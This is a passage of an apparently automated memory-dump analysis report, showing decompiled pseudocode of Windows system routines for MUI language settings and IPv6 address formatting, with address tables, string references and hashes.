                                                                                                                                                            					_v40 = _t322;
                                                                                                                                                            					E0097718A(_t257);
                                                                                                                                                            					_t338 = _t335 + 4;
                                                                                                                                                            					if(_t322 == _t318) {
                                                                                                                                                            						_v20 = _t318;
                                                                                                                                                            					} else {
                                                                                                                                                            						_v20 = E0095E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            					}
                                                                                                                                                            					if(_v20 == _t318) {
                                                                                                                                                            						_v40 = _t318;
                                                                                                                                                            						goto L58;
                                                                                                                                                            					} else {
                                                                                                                                                            						E00952340(_v20, _v8, _v24);
                                                                                                                                                            						_v16 = _v20;
                                                                                                                                                            						_a4 = _t318;
                                                                                                                                                            						_t261 = E0096E679(_v20, _t332);
                                                                                                                                                            						_t335 = _t338 + 0x14;
                                                                                                                                                            						while(1) {
                                                                                                                                                            							_v12 = _t261;
                                                                                                                                                            							if(_t261 == _t318) {
                                                                                                                                                            								break;
                                                                                                                                                            							}
                                                                                                                                                            							_v12 = _v12 + 2;
                                                                                                                                                            							 *_v12 = 0;
                                                                                                                                                            							E0095E2A8(_v12,  &_v68, _v16);
                                                                                                                                                            							if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            								_a4 = _a4 + 1;
                                                                                                                                                            							}
                                                                                                                                                            							_v16 = _v12;
                                                                                                                                                            							_t261 = E0096E679(_v12, _t332);
                                                                                                                                                            							_pop(_t322);
                                                                                                                                                            						}
                                                                                                                                                            						_t269 = _v16;
                                                                                                                                                            						if( *_v16 != _t318) {
                                                                                                                                                            							E0095E2A8(_t322,  &_v68, _t269);
                                                                                                                                                            							if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            								_a4 = _a4 + 1;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						if(_a4 == _t318) {
                                                                                                                                                            							E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
                                                                                                                                                            							_v40 = _t318;
                                                                                                                                                            							_v20 = _t318;
                                                                                                                                                            						}
                                                                                                                                                            						if(_v8 != _t318) {
                                                                                                                                                            							E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            						}
                                                                                                                                                            						_v8 = _t318;
                                                                                                                                                            						goto L30;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            				_t284 = _v24;
                                                                                                                                                            				_t322 = _t284 + 4;
                                                                                                                                                            				_push(_t284);
                                                                                                                                                            				_v48 = _t322;
                                                                                                                                                            				E0097718A(_t284);
                                                                                                                                                            				_t339 = _t335 + 4;
                                                                                                                                                            				if(_t322 == _t318) {
                                                                                                                                                            					_v28 = _t318;
                                                                                                                                                            				} else {
                                                                                                                                                            					_v28 = E0095E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
                                                                                                                                                            				}
                                                                                                                                                            				if(_v28 == _t318) {
                                                                                                                                                            					_v48 = _t318;
                                                                                                                                                            					goto L58;
                                                                                                                                                            				} else {
                                                                                                                                                            					E00952340(_v28, _v8, _v24);
                                                                                                                                                            					_v16 = _v28;
                                                                                                                                                            					_a4 = _t318;
                                                                                                                                                            					_t288 = E0096E679(_v28, _t332);
                                                                                                                                                            					_t335 = _t339 + 0x14;
                                                                                                                                                            					while(1) {
                                                                                                                                                            						_v12 = _t288;
                                                                                                                                                            						if(_t288 == _t318) {
                                                                                                                                                            							break;
                                                                                                                                                            						}
                                                                                                                                                            						_v12 = _v12 + 2;
                                                                                                                                                            						 *_v12 = 0;
                                                                                                                                                            						E0095E2A8(_v12,  &_v68, _v16);
                                                                                                                                                            						if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            							_a4 = _a4 + 1;
                                                                                                                                                            						}
                                                                                                                                                            						_v16 = _v12;
                                                                                                                                                            						_t288 = E0096E679(_v12, _t332);
                                                                                                                                                            						_pop(_t322);
                                                                                                                                                            					}
                                                                                                                                                            					_t296 = _v16;
                                                                                                                                                            					if( *_v16 != _t318) {
                                                                                                                                                            						E0095E2A8(_t322,  &_v68, _t296);
                                                                                                                                                            						if(E00975553(_t328,  &_v68,  &_v36) != 0) {
                                                                                                                                                            							_a4 = _a4 + 1;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					if(_a4 == _t318) {
                                                                                                                                                            						E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
                                                                                                                                                            						_v48 = _t318;
                                                                                                                                                            						_v28 = _t318;
                                                                                                                                                            					}
                                                                                                                                                            					if(_v8 != _t318) {
                                                                                                                                                            						E0095E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
                                                                                                                                                            					}
                                                                                                                                                            					_v8 = _t318;
                                                                                                                                                            					goto L17;
                                                                                                                                                            				}
                                                                                                                                                            			}





































                                                                                                                                                            0x00978788
                                                                                                                                                            0x00978788
                                                                                                                                                            0x00978791
                                                                                                                                                            0x00978794
                                                                                                                                                            0x00978798
                                                                                                                                                            0x0097879b
                                                                                                                                                            0x0097879e
                                                                                                                                                            0x009787a1
                                                                                                                                                            0x009787a4
                                                                                                                                                            0x009787a7
                                                                                                                                                            0x009787aa
                                                                                                                                                            0x009787af
                                                                                                                                                            0x009c1ad3
                                                                                                                                                            0x00978b0a
                                                                                                                                                            0x00978b0d
                                                                                                                                                            0x00978b13
                                                                                                                                                            0x00978b19
                                                                                                                                                            0x00978b1f
                                                                                                                                                            0x00978b25
                                                                                                                                                            0x00978b2b
                                                                                                                                                            0x00978b31
                                                                                                                                                            0x00978b37
                                                                                                                                                            0x00978b3d
                                                                                                                                                            0x00978b46
                                                                                                                                                            0x00978b46
                                                                                                                                                            0x009787c6
                                                                                                                                                            0x009787d0
                                                                                                                                                            0x009c1ae0
                                                                                                                                                            0x009c1ae6
                                                                                                                                                            0x009c1af8
                                                                                                                                                            0x009c1af8
                                                                                                                                                            0x009c1afd
                                                                                                                                                            0x009c1afe
                                                                                                                                                            0x009c1b01
                                                                                                                                                            0x009c1b06
                                                                                                                                                            0x009c1b06
                                                                                                                                                            0x009787d6
                                                                                                                                                            0x009787f2
                                                                                                                                                            0x009787f7
                                                                                                                                                            0x00978807
                                                                                                                                                            0x0097880a
                                                                                                                                                            0x0097880f
                                                                                                                                                            0x00978810
                                                                                                                                                            0x00978813
                                                                                                                                                            0x00978818
                                                                                                                                                            0x00978818
                                                                                                                                                            0x0097882c
                                                                                                                                                            0x00978831
                                                                                                                                                            0x00978838
                                                                                                                                                            0x00978908
                                                                                                                                                            0x00978920
                                                                                                                                                            0x009789f0
                                                                                                                                                            0x00978a08
                                                                                                                                                            0x00978af6
                                                                                                                                                            0x00978af6
                                                                                                                                                            0x00978af8
                                                                                                                                                            0x00978afb
                                                                                                                                                            0x009c1beb
                                                                                                                                                            0x009c1beb
                                                                                                                                                            0x00978b04
                                                                                                                                                            0x009c1bf8
                                                                                                                                                            0x009c1c0e
                                                                                                                                                            0x009c1c13
                                                                                                                                                            0x009c1c16
                                                                                                                                                            0x009c1c16
                                                                                                                                                            0x009c1bf8
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978b04
                                                                                                                                                            0x00978a0e
                                                                                                                                                            0x00978a11
                                                                                                                                                            0x00978a14
                                                                                                                                                            0x00978a15
                                                                                                                                                            0x00978a18
                                                                                                                                                            0x00978a22
                                                                                                                                                            0x00978b59
                                                                                                                                                            0x00978a28
                                                                                                                                                            0x00978a3c
                                                                                                                                                            0x00978a3c
                                                                                                                                                            0x00978a42
                                                                                                                                                            0x009c1bb0
                                                                                                                                                            0x009c1b11
                                                                                                                                                            0x009c1b11
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978a48
                                                                                                                                                            0x00978a51
                                                                                                                                                            0x00978a5b
                                                                                                                                                            0x00978a5e
                                                                                                                                                            0x00978a61
                                                                                                                                                            0x00978a69
                                                                                                                                                            0x00978a69
                                                                                                                                                            0x00978a6d
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978a74
                                                                                                                                                            0x00978a7c
                                                                                                                                                            0x00978a7d
                                                                                                                                                            0x00978a91
                                                                                                                                                            0x00978a93
                                                                                                                                                            0x00978a93
                                                                                                                                                            0x00978a98
                                                                                                                                                            0x00978a9b
                                                                                                                                                            0x00978aa1
                                                                                                                                                            0x00978aa1
                                                                                                                                                            0x00978aa4
                                                                                                                                                            0x00978aaa
                                                                                                                                                            0x00978ab1
                                                                                                                                                            0x00978ac5
                                                                                                                                                            0x00978ac7
                                                                                                                                                            0x00978ac7
                                                                                                                                                            0x00978ac5
                                                                                                                                                            0x00978ace
                                                                                                                                                            0x009c1bc9
                                                                                                                                                            0x009c1bce
                                                                                                                                                            0x009c1bd2
                                                                                                                                                            0x009c1bd2
                                                                                                                                                            0x00978ad8
                                                                                                                                                            0x00978aeb
                                                                                                                                                            0x00978aeb
                                                                                                                                                            0x00978af0
                                                                                                                                                            0x00978af4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978af4
                                                                                                                                                            0x00978a42
                                                                                                                                                            0x00978926
                                                                                                                                                            0x00978929
                                                                                                                                                            0x0097892c
                                                                                                                                                            0x0097892d
                                                                                                                                                            0x00978930
                                                                                                                                                            0x00978935
                                                                                                                                                            0x0097893a
                                                                                                                                                            0x00978b51
                                                                                                                                                            0x00978940
                                                                                                                                                            0x00978954
                                                                                                                                                            0x00978954
                                                                                                                                                            0x0097895a
                                                                                                                                                            0x009c1b63
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978960
                                                                                                                                                            0x00978969
                                                                                                                                                            0x00978973
                                                                                                                                                            0x00978976
                                                                                                                                                            0x00978979
                                                                                                                                                            0x0097897e
                                                                                                                                                            0x00978981
                                                                                                                                                            0x00978981
                                                                                                                                                            0x00978986
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1b6e
                                                                                                                                                            0x009c1b74
                                                                                                                                                            0x009c1b7b
                                                                                                                                                            0x009c1b8f
                                                                                                                                                            0x009c1b91
                                                                                                                                                            0x009c1b91
                                                                                                                                                            0x009c1b99
                                                                                                                                                            0x009c1b9c
                                                                                                                                                            0x009c1ba2
                                                                                                                                                            0x009c1ba2
                                                                                                                                                            0x0097898c
                                                                                                                                                            0x00978992
                                                                                                                                                            0x00978999
                                                                                                                                                            0x009789ad
                                                                                                                                                            0x009c1ba8
                                                                                                                                                            0x009c1ba8
                                                                                                                                                            0x009789ad
                                                                                                                                                            0x009789b6
                                                                                                                                                            0x009789c8
                                                                                                                                                            0x009789cd
                                                                                                                                                            0x009789d0
                                                                                                                                                            0x009789d0
                                                                                                                                                            0x009789d6
                                                                                                                                                            0x009789e8
                                                                                                                                                            0x009789e8
                                                                                                                                                            0x009789ed
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009789ed
                                                                                                                                                            0x0097895a
                                                                                                                                                            0x0097883e
                                                                                                                                                            0x00978841
                                                                                                                                                            0x00978844
                                                                                                                                                            0x00978845
                                                                                                                                                            0x00978848
                                                                                                                                                            0x0097884d
                                                                                                                                                            0x00978852
                                                                                                                                                            0x00978b49
                                                                                                                                                            0x00978858
                                                                                                                                                            0x0097886c
                                                                                                                                                            0x0097886c
                                                                                                                                                            0x00978872
                                                                                                                                                            0x009c1b0e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978878
                                                                                                                                                            0x00978881
                                                                                                                                                            0x0097888b
                                                                                                                                                            0x0097888e
                                                                                                                                                            0x00978891
                                                                                                                                                            0x00978896
                                                                                                                                                            0x00978899
                                                                                                                                                            0x00978899
                                                                                                                                                            0x0097889e
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009c1b21
                                                                                                                                                            0x009c1b27
                                                                                                                                                            0x009c1b2e
                                                                                                                                                            0x009c1b42
                                                                                                                                                            0x009c1b44
                                                                                                                                                            0x009c1b44
                                                                                                                                                            0x009c1b4c
                                                                                                                                                            0x009c1b4f
                                                                                                                                                            0x009c1b55
                                                                                                                                                            0x009c1b55
                                                                                                                                                            0x009788a4
                                                                                                                                                            0x009788aa
                                                                                                                                                            0x009788b1
                                                                                                                                                            0x009788c5
                                                                                                                                                            0x009c1b5b
                                                                                                                                                            0x009c1b5b
                                                                                                                                                            0x009788c5
                                                                                                                                                            0x009788ce
                                                                                                                                                            0x009788e0
                                                                                                                                                            0x009788e5
                                                                                                                                                            0x009788e8
                                                                                                                                                            0x009788e8
                                                                                                                                                            0x009788ee
                                                                                                                                                            0x00978900
                                                                                                                                                            0x00978900
                                                                                                                                                            0x00978905
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00978905

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            • Kernel-MUI-Language-SKU, xrefs: 009789FC
                                                                                                                                                            • Kernel-MUI-Language-Allowed, xrefs: 00978827
                                                                                                                                                            • Kernel-MUI-Number-Allowed, xrefs: 009787E6
                                                                                                                                                            • Kernel-MUI-Language-Disallowed, xrefs: 00978914
                                                                                                                                                            • WindowsExcludedProcs, xrefs: 009787C1
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _wcspbrk
                                                                                                                                                            • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                            • API String ID: 402402107-258546922
                                                                                                                                                            • Opcode ID: e28719b9ac9e55a38b8e3b4b7351be63a4fdd062ac6634f669eaa913cb52294c
                                                                                                                                                            • Instruction ID: 1aa689d0bdbe2e35e6529a82357ebe125fcac06d02e8fa3c01f52588cafe3b34
                                                                                                                                                            • Opcode Fuzzy Hash: e28719b9ac9e55a38b8e3b4b7351be63a4fdd062ac6634f669eaa913cb52294c
                                                                                                                                                            • Instruction Fuzzy Hash: 25F116B2D00209EFCF15DFA5C985EEEB7B9FF48300F10846AE509A7211EB359A45DB61
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 38%
                                                                                                                                                            			E009913CB(intOrPtr* _a4, intOrPtr _a8) {
                                                                                                                                                            				char _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				intOrPtr* _v16;
                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                            				char _v24;
                                                                                                                                                            				intOrPtr _t71;
                                                                                                                                                            				signed int _t78;
                                                                                                                                                            				signed int _t86;
                                                                                                                                                            				char _t90;
                                                                                                                                                            				signed int _t91;
                                                                                                                                                            				signed int _t96;
                                                                                                                                                            				intOrPtr _t108;
                                                                                                                                                            				signed int _t114;
                                                                                                                                                            				void* _t115;
                                                                                                                                                            				intOrPtr _t128;
                                                                                                                                                            				intOrPtr* _t129;
                                                                                                                                                            				void* _t130;
                                                                                                                                                            
                                                                                                                                                            				_t129 = _a4;
                                                                                                                                                            				_t128 = _a8;
                                                                                                                                                            				_t116 = 0;
                                                                                                                                                            				_t71 = _t128 + 0x5c;
                                                                                                                                                            				_v8 = 8;
                                                                                                                                                            				_v20 = _t71;
                                                                                                                                                            				if( *_t129 == 0) {
                                                                                                                                                            					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
                                                                                                                                                            						goto L5;
                                                                                                                                                            					} else {
                                                                                                                                                            						_t96 =  *(_t129 + 8) & 0x0000ffff;
                                                                                                                                                            						if(_t96 != 0) {
                                                                                                                                                            							L38:
                                                                                                                                                            							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
                                                                                                                                                            								goto L5;
                                                                                                                                                            							} else {
                                                                                                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            								_t86 = E00987707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                            								L36:
                                                                                                                                                            								return _t128 + _t86 * 2;
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
                                                                                                                                                            						if(_t114 == 0) {
                                                                                                                                                            							L33:
                                                                                                                                                            							_t115 = 0x952926;
                                                                                                                                                            							L35:
                                                                                                                                                            							_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            							_push( *(_t129 + 0xc) & 0x000000ff);
                                                                                                                                                            							_t86 = E00987707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
                                                                                                                                                            							goto L36;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t114 != 0xffff) {
                                                                                                                                                            							_t116 = 0;
                                                                                                                                                            							goto L38;
                                                                                                                                                            						}
                                                                                                                                                            						if(_t114 != 0) {
                                                                                                                                                            							_t115 = 0x959cac;
                                                                                                                                                            							goto L35;
                                                                                                                                                            						}
                                                                                                                                                            						goto L33;
                                                                                                                                                            					}
                                                                                                                                                            				} else {
                                                                                                                                                            					L5:
                                                                                                                                                            					_a8 = _t116;
                                                                                                                                                            					_a4 = _t116;
                                                                                                                                                            					_v12 = _t116;
                                                                                                                                                            					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
                                                                                                                                                            						if( *(_t129 + 0xa) == 0xfe5e) {
                                                                                                                                                            							_v8 = 6;
                                                                                                                                                            						}
                                                                                                                                                            					}
                                                                                                                                                            					_t90 = _v8;
                                                                                                                                                            					if(_t90 <= _t116) {
                                                                                                                                                            						L11:
                                                                                                                                                            						if(_a8 - _a4 <= 1) {
                                                                                                                                                            							_a8 = _t116;
                                                                                                                                                            							_a4 = _t116;
                                                                                                                                                            						}
                                                                                                                                                            						_t91 = 0;
                                                                                                                                                            						if(_v8 <= _t116) {
                                                                                                                                                            							L22:
                                                                                                                                                            							if(_v8 < 8) {
                                                                                                                                                            								_push( *(_t129 + 0xf) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xe) & 0x000000ff);
                                                                                                                                                            								_push( *(_t129 + 0xd) & 0x000000ff);
                                                                                                                                                            								_t128 = _t128 + E00987707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
                                                                                                                                                            							}
                                                                                                                                                            							return _t128;
                                                                                                                                                            						} else {
                                                                                                                                                            							L14:
                                                                                                                                                            							L14:
                                                                                                                                                            							if(_a4 > _t91 || _t91 >= _a8) {
                                                                                                                                                            								if(_t91 != _t116 && _t91 != _a8) {
                                                                                                                                                            									_push(":");
                                                                                                                                                            									_push(_t71 - _t128 >> 1);
                                                                                                                                                            									_push(_t128);
                                                                                                                                                            									_t128 = _t128 + E00987707() * 2;
                                                                                                                                                            									_t71 = _v20;
                                                                                                                                                            									_t130 = _t130 + 0xc;
                                                                                                                                                            								}
                                                                                                                                                            								_t78 = E00987707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
                                                                                                                                                            								_t130 = _t130 + 0x10;
                                                                                                                                                            							} else {
                                                                                                                                                            								_push(L"::");
                                                                                                                                                            								_push(_t71 - _t128 >> 1);
                                                                                                                                                            								_push(_t128);
                                                                                                                                                            								_t78 = E00987707();
                                                                                                                                                            								_t130 = _t130 + 0xc;
                                                                                                                                                            								_t91 = _a8 - 1;
                                                                                                                                                            							}
                                                                                                                                                            							_t91 = _t91 + 1;
                                                                                                                                                            							_t128 = _t128 + _t78 * 2;
                                                                                                                                                            							_t71 = _v20;
                                                                                                                                                            							if(_t91 >= _v8) {
                                                                                                                                                            								goto L22;
                                                                                                                                                            							}
                                                                                                                                                            							_t116 = 0;
                                                                                                                                                            							goto L14;
                                                                                                                                                            						}
                                                                                                                                                            					} else {
                                                                                                                                                            						_t108 = 1;
                                                                                                                                                            						_v16 = _t129;
                                                                                                                                                            						_v24 = _t90;
                                                                                                                                                            						do {
                                                                                                                                                            							if( *_v16 == _t116) {
                                                                                                                                                            								if(_t108 - _v12 > _a8 - _a4) {
                                                                                                                                                            									_a4 = _v12;
                                                                                                                                                            									_a8 = _t108;
                                                                                                                                                            								}
                                                                                                                                                            								_t116 = 0;
                                                                                                                                                            							} else {
                                                                                                                                                            								_v12 = _t108;
                                                                                                                                                            							}
                                                                                                                                                            							_v16 = _v16 + 2;
                                                                                                                                                            							_t108 = _t108 + 1;
                                                                                                                                                            							_t26 =  &_v24;
                                                                                                                                                            							 *_t26 = _v24 - 1;
                                                                                                                                                            						} while ( *_t26 != 0);
                                                                                                                                                            						goto L11;
                                                                                                                                                            					}
                                                                                                                                                            				}
                                                                                                                                                            			}




















                                                                                                                                                            0x009913d5
                                                                                                                                                            0x009913d9
                                                                                                                                                            0x009913dc
                                                                                                                                                            0x009913de
                                                                                                                                                            0x009913e1
                                                                                                                                                            0x009913e8
                                                                                                                                                            0x009913ee
                                                                                                                                                            0x009be8fd
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009be921
                                                                                                                                                            0x009be921
                                                                                                                                                            0x009be928
                                                                                                                                                            0x009be982
                                                                                                                                                            0x009be98a
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009be99a
                                                                                                                                                            0x009be99e
                                                                                                                                                            0x009be9a3
                                                                                                                                                            0x009be9a8
                                                                                                                                                            0x009be9b9
                                                                                                                                                            0x009be978
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009be978
                                                                                                                                                            0x009be98a
                                                                                                                                                            0x009be92a
                                                                                                                                                            0x009be931
                                                                                                                                                            0x009be944
                                                                                                                                                            0x009be944
                                                                                                                                                            0x009be950
                                                                                                                                                            0x009be954
                                                                                                                                                            0x009be959
                                                                                                                                                            0x009be95e
                                                                                                                                                            0x009be963
                                                                                                                                                            0x009be970
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009be975
                                                                                                                                                            0x009be93b
                                                                                                                                                            0x009be980
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009be980
                                                                                                                                                            0x009be942
                                                                                                                                                            0x009be94b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009be94b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009be942
                                                                                                                                                            0x009913f4
                                                                                                                                                            0x009913f4
                                                                                                                                                            0x009913f9
                                                                                                                                                            0x009913fc
                                                                                                                                                            0x009913ff
                                                                                                                                                            0x00991406
                                                                                                                                                            0x009be9cc
                                                                                                                                                            0x009be9d2
                                                                                                                                                            0x009be9d2
                                                                                                                                                            0x009be9cc
                                                                                                                                                            0x0099140c
                                                                                                                                                            0x00991411
                                                                                                                                                            0x00991431
                                                                                                                                                            0x0099143a
                                                                                                                                                            0x0099143c
                                                                                                                                                            0x0099143f
                                                                                                                                                            0x0099143f
                                                                                                                                                            0x00991442
                                                                                                                                                            0x00991447
                                                                                                                                                            0x009914a8
                                                                                                                                                            0x009914ac
                                                                                                                                                            0x009be9e2
                                                                                                                                                            0x009be9e7
                                                                                                                                                            0x009be9ec
                                                                                                                                                            0x009bea05
                                                                                                                                                            0x009bea05
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00991449
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00991449
                                                                                                                                                            0x0099144c
                                                                                                                                                            0x00991459
                                                                                                                                                            0x00991462
                                                                                                                                                            0x00991469
                                                                                                                                                            0x0099146a
                                                                                                                                                            0x00991470
                                                                                                                                                            0x00991473
                                                                                                                                                            0x00991476
                                                                                                                                                            0x00991476
                                                                                                                                                            0x00991490
                                                                                                                                                            0x00991495
                                                                                                                                                            0x0099138e
                                                                                                                                                            0x00991390
                                                                                                                                                            0x00991397
                                                                                                                                                            0x00991398
                                                                                                                                                            0x00991399
                                                                                                                                                            0x009913a1
                                                                                                                                                            0x009913a4
                                                                                                                                                            0x009913a4
                                                                                                                                                            0x00991498
                                                                                                                                                            0x0099149c
                                                                                                                                                            0x0099149f
                                                                                                                                                            0x009914a2
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009914a4
                                                                                                                                                            0x00000000
                                                                                                                                                            0x009914a4
                                                                                                                                                            0x00991413
                                                                                                                                                            0x00991415
                                                                                                                                                            0x00991416
                                                                                                                                                            0x00991419
                                                                                                                                                            0x0099141c
                                                                                                                                                            0x00991422
                                                                                                                                                            0x009913b7
                                                                                                                                                            0x009913bc
                                                                                                                                                            0x009913bf
                                                                                                                                                            0x009913bf
                                                                                                                                                            0x009913c2
                                                                                                                                                            0x00991424
                                                                                                                                                            0x00991424
                                                                                                                                                            0x00991424
                                                                                                                                                            0x00991427
                                                                                                                                                            0x0099142b
                                                                                                                                                            0x0099142c
                                                                                                                                                            0x0099142c
                                                                                                                                                            0x0099142c
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0099141c
                                                                                                                                                            0x00991411

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000006.00000002.2218202835.0000000000940000.00000040.00000001.sdmp, Offset: 00930000, based on PE: true
                                                                                                                                                            • Associated: 00000006.00000002.2218194748.0000000000930000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218362808.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218367843.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218373725.0000000000A34000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218380017.0000000000A37000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218387315.0000000000A40000.00000040.00000001.sdmp Download File
                                                                                                                                                            • Associated: 00000006.00000002.2218455487.0000000000AA0000.00000040.00000001.sdmp Download File
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ___swprintf_l
                                                                                                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                                                            • API String ID: 48624451-2108815105
                                                                                                                                                            • Opcode ID: 420e2c8c7698c341b34901ebca4619531a3651aee9e7d73e5c249fde920fe72b
                                                                                                                                                            • Instruction ID: 7b42dcda49a0845d8acdd824aef4a17602c9268ebfc06ee5da0cf72f04efa294
                                                                                                                                                            • Opcode Fuzzy Hash: 420e2c8c7698c341b34901ebca4619531a3651aee9e7d73e5c249fde920fe72b
                                                                                                                                                            • Instruction Fuzzy Hash: B4612771904656AADF34DF9EC8808BEBBB9FFD8301B18C42DF49A47640D234AA44CB60
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 64%
                                                                                                                                                            			E00987EFD(void* __ecx, intOrPtr _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				char _v540;
                                                                                                                                                            				unsigned int _v544;
                                                                                                                                                            				signed int _v548;
                                                                                                                                                            				intOrPtr _v552;
                                                                                                                                                            				char _v556;
                                                                                                                                                            				void* __ebx;
                                                                                                                                                            				void* __edi;
                                                                                                                                                            				void* __esi;
                                                                                                                                                            				signed int _t33;
                                                                                                                                                            				void* _t38;
                                                                                                                                                            				unsigned int _t46;
                                                                                                                                                            				unsigned int _t47;
                                                                                                                                                            				unsigned int _t52;
                                                                                                                                                            				intOrPtr _t56;
                                                                                                                                                            				unsigned int _t62;
                                                                                                                                                            				void* _t69;
                                                                                                                                                            				void* _t70;
                                                                                                                                                            				intOrPtr _t72;
                                                                                                                                                            				signed int _t73;
                                                                                                                                                            				void* _t74;
                                                                                                                                                            				void* _t75;
                                                                                                                                                            				void* _t76;
                                                                                                                                                            				void* _t77;
                                                                                                                                                            
                                                                                                                                                            				_t33 =  *0xa32088; // 0x7769a8cb
                                                                                                                                                            				_v8 = _t33 ^ _t73;
                                                                                                                                                            				_v548 = _v548 & 0x00000000;
                                                                                                                                                            				_t72 = _a4;
                                                                                                                                                            				if(E00987F4F(__ecx, _t72 + 0x2c,  &_v548) >= 0) {
                                                                                                                                                            					__eflags = _v548;
                                                                                                                                                            					if(_v548 == 0) {
                                                                                                                                                            						goto L1;
                                                                                                                                                            					}
                                                                                                                                                            					_t62 = _t72 + 0x24;
